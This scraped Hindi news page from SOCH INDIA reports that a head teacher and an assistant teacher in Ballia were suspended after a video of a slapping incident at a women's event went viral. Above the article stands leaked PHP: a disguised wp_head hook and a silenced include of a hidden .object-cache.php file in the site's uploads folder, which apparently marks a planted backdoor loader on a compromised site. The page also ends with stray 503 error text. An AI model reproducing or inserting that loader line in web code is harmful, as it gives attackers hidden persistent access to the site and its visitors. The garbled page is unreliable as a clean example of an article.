add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बलिया: ‘थप्पड़ कांड’ में शिक्षक और प्रधानाध्यापिका सस्पेंड, नारी चौपाल के दौरान मारपीट का वीडियो हुआ था वायरल – SOCH INDIA
Menu

बलिया: ‘थप्पड़ कांड’ में शिक्षक और प्रधानाध्यापिका सस्पेंड, नारी चौपाल के दौरान मारपीट का वीडियो हुआ था वायरल

nobanner

विस्तार

बलिया जिले के ब्लॉक संसाधन केंद्र चिलकहर पर नौ मार्च को आयोजित नारी चौपाल के दौरान मारपीट की घटना से संबंधित वायरल वीडियो प्रकरण में बीएसए शिवनारायण सिंह ने बड़ी कार्रवाई की है। बीएसए ने घटना से संबंधित शिक्षक और प्रधानाध्यापिका को निलंबित कर दिया है।

बीएसए की इस कार्रवाई से शिक्षा विभाग में हड़कंप मच गया है। वहीं, सबसे बड़ी बात तो यह है कि सहायक अध्यापक को जिस प्रधानाध्यापिका ने मारा था उसी के गांव के विद्यालय पर उनकी नियुक्ति कर दी है। इस पर अध्यापक ने अपनी जान माल की सुरक्षा की गुहार लगाई है।

दोनों एक दूसरे के खिलाफ कराया मुकदमा
बीते नौ मार्च को ब्लॉक संसाधन केंद्र चिलकहर पर महिला सम्मान समारोह (नारी चौपाल) के दौरान किसी बात को लेकर प्रधानाध्यापिका रंजना पांडेय ने सहायक अध्यापक मानवेंद्र सिंह को भरे मंच पर थप्पड़ से मार दिया था। इसके अलावा जान से मारने की धमकी भी दी थी। मामले का वीडियो सोशल मीडिया पर वायरल हो गया था। प्र

करण में बीएसए ने दो खंड शिक्षाधिकारियों को मामले की जांच सौपी थी। वहीं, दोनों पक्षों की तहरीर पर गड़वार पुलिस ने मुकदमा पंजीकृत किया था। प्रधानाध्यापिका रंजना पांडेय की तहरीर पर सहायक अध्यापक मानवेंद्र सिंह, बलवंत सिंह , अरुण पांडे समेत एक अज्ञात पर मुकदमा पंजीकृत किया गया था।

उधर मानवेंद्र सिंह सहायक अध्यापक की तहरीर पर प्रधानाध्यापिका रंजना पांडेय के खिलाफ एससी-एसटी एक्ट सहित अन्य धाराओं में मुकदमा पंजीकृत किया था। जांच रिपोर्ट मिलने के बाद प्राथमिक विद्यालय सवन राजभर बस्ती की प्रभारी प्रधानाध्यापक रंजना पांडेय एवं प्राथमिक विद्यालय डान्देपुर के सहायक अध्यापक मानवेन्द्र सिंह को तत्काल प्रभाव से निलंबित कर दिया गया है।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.